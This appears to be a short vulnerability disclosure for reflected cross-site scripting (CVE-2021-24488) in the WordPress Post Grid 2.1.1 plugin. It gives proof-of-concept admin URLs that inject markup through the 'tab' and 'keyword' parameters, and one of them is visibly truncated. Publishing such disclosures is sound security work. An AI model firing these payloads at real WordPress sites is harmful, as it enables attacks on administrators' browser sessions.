# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS) # Date: 3/16/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/post-grid/ # Version: 2.1.1 # Tested on: Windows 10 # CVE: CVE-2021-24488 1. Description: This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="> wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//